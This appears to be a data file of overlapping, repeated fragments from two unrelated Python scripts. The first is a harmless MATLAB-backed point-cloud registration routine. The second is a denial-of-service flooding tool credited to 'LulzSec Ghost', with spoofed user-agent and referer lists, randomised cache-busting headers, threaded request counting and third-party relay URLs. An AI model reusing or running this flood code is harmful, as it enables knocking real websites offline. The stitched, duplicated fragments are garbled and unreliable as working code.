[ "i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i]", "np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array of points", "matlab.engine import numpy as np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create", "= [[] for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step", "k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for", "* import matlab.engine import numpy as np import scipy.io def CalculateGlobICP(): eng =", "#50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'):", "numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput()", "registeredModel = [] #registeredmodel[0][x][0] cointains the array of points of pointcloud x for", ", actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array of points of", "range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel =", "RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras,", "numpy as np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list", "steps Hs = [[] for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz", "function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is", "as np import scipy.io from libs import * import matlab.engine import numpy as", "import matlab.engine import numpy as np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab()", "list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\")", "actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array", "print(mat['R'].shape) #first dimension is number of cameras, second is number of steps Hs", "number of steps Hs = [[] for i in range(mat['R'].shape[0])] for i in", "#create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the", "print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array of points of pointcloud x", "actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array of points of pointcloud", "def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras, second", "i in range(mat['R'].shape[0]): #cuz last step returns no rotation for k in range(mat['R'].shape[1]-1):", "the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension", "import sys, os sys.path.append('./libs') import numpy as np import scipy.io from libs import", "#cuz last step returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs =", "in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains", "dimension is number of cameras, second is number of steps Hs = [[]", "k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0]", "eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat", "in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel", "for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in range() # Rt2Homo(R=None,t=None) return actualHs,registeredModel", "in range(mat['R'].shape[0]): #cuz last step returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k])))", "the array of points of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for", "of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return", "array of points of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i", "eng = matlab.engine.start_matlab() #create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending", "CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0)", "cameras, second is number of steps Hs = [[] for i in range(mat['R'].shape[0])]", "for i in range(mat['R'].shape[0]): #cuz last step returns no rotation for k in", "RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras, second is", "actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for", "mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras, second is number", "from libs import * import matlab.engine import numpy as np import scipy.io def", "Hs = [[] for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last", "no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in", "i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step returns no rotation", "rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])]", "for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape)", "is number of cameras, second is number of steps Hs = [[] for", "number of cameras, second is number of steps Hs = [[] for i", "libs import * import matlab.engine import numpy as np import scipy.io def CalculateGlobICP():", "in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i", "sys.path.append('./libs') import numpy as np import scipy.io from libs import * import matlab.engine", "as np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of", "= [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k", "scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of numpy arrays #50", "import numpy as np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a", "scipy.io from libs import * import matlab.engine import numpy as np import scipy.io", "for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = []", "cointains the array of points of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0]))", "numpy as np import scipy.io from libs import * import matlab.engine import numpy", "range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k]", "points of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in range()", "#registeredmodel[0][x][0] cointains the array of points of pointcloud x for i in range(len(actualHs)):", "in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] =", "range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the", "of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in range() #", "is number of steps Hs = [[] for i in range(mat['R'].shape[0])] for i", "arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def", "for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i])", "range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in", "print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] ,", "in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step returns no rotation for", "#sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath)", "range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step returns no rotation for k", "range(mat['R'].shape[0]): #cuz last step returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs", "matlab.engine.start_matlab() #create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to", "import numpy as np import scipy.io from libs import * import matlab.engine import", "nargout=0) #sending input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat =", "return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of", "a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input to the function", "x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in range() # Rt2Homo(R=None,t=None) return", "of cameras, second is number of steps Hs = [[] for i in", "def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5,", "for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step returns no", "of points of pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in", "= np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape) registeredModel = [] #registeredmodel[0][x][0] cointains the array of", "step returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for", "np import scipy.io from libs import * import matlab.engine import numpy as np", "= [] #registeredmodel[0][x][0] cointains the array of points of pointcloud x for i", "import scipy.io from libs import * import matlab.engine import numpy as np import", "Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]):", "import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of numpy arrays", "sys, os sys.path.append('./libs') import numpy as np import scipy.io from libs import *", "returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4) for i", "import * import matlab.engine import numpy as np import scipy.io def CalculateGlobICP(): eng", "[[] for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]): #cuz last step returns", "scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras, second is number of steps", "[] #registeredmodel[0][x][0] cointains the array of points of pointcloud x for i in", "= scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number of cameras, second is number of", "to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first", "second is number of steps Hs = [[] for i in range(mat['R'].shape[0])] for", "of steps Hs = [[] for i in range(mat['R'].shape[0])] for i in range(mat['R'].shape[0]):", "eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape) #first dimension is number", "#first dimension is number of cameras, second is number of steps Hs =", "np import scipy.io def CalculateGlobICP(): eng = matlab.engine.start_matlab() #create a list of numpy", "last step returns no rotation for k in range(mat['R'].shape[1]-1): Hs[i].append(matmanip.Rt2Homo(mat['R'][i,k],np.squeeze(mat['t'][i,k]))) actualHs = [np.eye(4)", "pointcloud x for i in range(len(actualHs)): registeredModel.append(print(mat['registeredModel'][0][i][0])) #for i in range() # Rt2Homo(R=None,t=None)", "input to the function eng.cd(\"./GlobalProcrustesICP\") return RetrieveGlobICPOutput() def RetrieveGlobICPOutput(outputpath='./GlobalProcrustesICP/globalIcpOut.mat'): mat = scipy.io.loadmat(outputpath) print(mat['R'].shape)", "[np.eye(4) for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in", "i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1): actualHs[i] = np.dot(Hs[i][k] , actualHs[i]) print(actualHs[0].shape)", "os sys.path.append('./libs') import numpy as np import scipy.io from libs import * import", "= matlab.engine.start_matlab() #create a list of numpy arrays #50 eng.globalProcrustesWrapper(modelpcs,5, nargout=0) #sending input", "for i in range(mat['R'].shape[0])] print(len(actualHs),actualHs[0].shape) for i in range(mat['R'].shape[0]): for k in range(mat['R'].shape[1]-1):" ]
[ "headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global", "1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=')", "/|-._: : | \\ \\ / / :_| ;`-._; __..--'; : : /", "libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista", "headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')", "Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x", "Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com;", "headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider')", "Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible;", "S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1;", "/ / / / / ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30", "1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0", "X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn')", "previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" % (request_counter)", "Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)", "CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea", "Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0", "Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19", "<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0", "- http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve", "threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter)", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like", "search engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at", "Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)')", "headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=')", "site for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si;", "Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U;", "headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider", "; : `. // // // // ,' / ~~~`.______//____//____//____//_______,'~ // //~ //", "_/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' |", "http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0')", "Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en))", "`:\\ \\ // `:`. ,' \\ /-._; | : : :: ,. .", "useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner", "bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds", "SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0;", "Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch;", "gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)')", "headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog", "import threading import random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0", "Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1;", "Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos", "'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost' print", "(Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1", "(MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1", "headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)')", "2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;')", "(Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a", "Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note", "headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch", "PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3)", "(www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence", "% (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv) <", ": `.`.) _,' |;._:: | | | | `| : `' ,' `.", ",'_/.-/': : _..-'''/ / | \\ \\ _|/| \\ /-./_ \\; \\ \\,;'", "headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com')", "random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive')", "Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') 